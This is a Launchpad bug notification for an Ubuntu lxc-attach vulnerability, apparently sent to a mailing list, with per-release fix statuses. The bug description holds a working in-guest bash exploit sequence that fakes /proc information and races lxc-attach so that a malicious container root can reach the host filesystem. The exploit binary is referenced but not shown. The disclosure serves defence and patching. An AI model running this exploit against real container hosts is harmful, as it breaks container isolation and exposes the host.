This bug is missing log files that will aid in diagnosing the problem. >From a terminal window please run:
apport-collect 1639345 and then change the status of the bug to 'Confirmed'. If, due to the nature of the issue you have encountered, you are unable to run this command, please add a comment stating that fact and change the bug status to 'Confirmed'. This change has been made by an automated script, maintained by the Ubuntu Kernel Team. ** Changed in: linux (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1639345 Title: lxc-attach to malicious container allows access to host Status in linux package in Ubuntu: Incomplete Status in lxc package in Ubuntu: Fix Released Status in linux source package in Trusty: Fix Committed Status in lxc source package in Trusty: Fix Released Status in linux source package in Vivid: Fix Committed Status in lxc source package in Vivid: Fix Released Status in linux source package in Xenial: Fix Committed Status in lxc source package in Xenial: Fix Released Status in linux source package in Yakkety: Fix Committed Status in lxc source package in Yakkety: Fix Released Bug description: A malicious root user in an unprivileged container may interfere with lxc-attach to provide manipulated guest proc file system information to disable dropping of capabilities and may in the end access the host file system by winning a very easy race against lxc-attach. In guest sequence: cat <<EOF > /tmp/test #!/bin/bash -e rm -rf /test || true mkdir -p /test/sys/kernel echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts echo 0 > /test/sys/kernel/cap_last_cap mkdir -p /test/self mknod /test/self/status p cd /proc mount -o bind /test /proc while true; do pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/') if [ "\${pid}" != "" ]; then cd / umount -i -f -l -n /proc exec /LxcAttachEscape "\${pid}" /bin/bash fi sleep 1 done EOF See attachment for LxcAttachEscape.c Exploit uses fixed fd=7 for attacking, on other test environment, it might be other fd. Tests were performed by attacking lxc-attach started by screen lxc-attach -n [guestname] which is the sequence required against the TTY-stealing attacks also not fixed in all lxc-attach versions. In my opinion two bugs might need fixing: * lxc-attach should not use untrusted/manipulated information for proceeding * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS # lsb_release -r -d Description: Ubuntu 16.04.1 LTS Release: 16.04 # apt-cache policy lxc1 lxc1: Installed: 2.0.5-0ubuntu1~ubuntu16.04.2 Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2 Version table: *** 2.0.5-0ubuntu1~ubuntu16.04.2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages 100 /var/lib/dpkg/status 2.0.0-0ubuntu2 500 500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp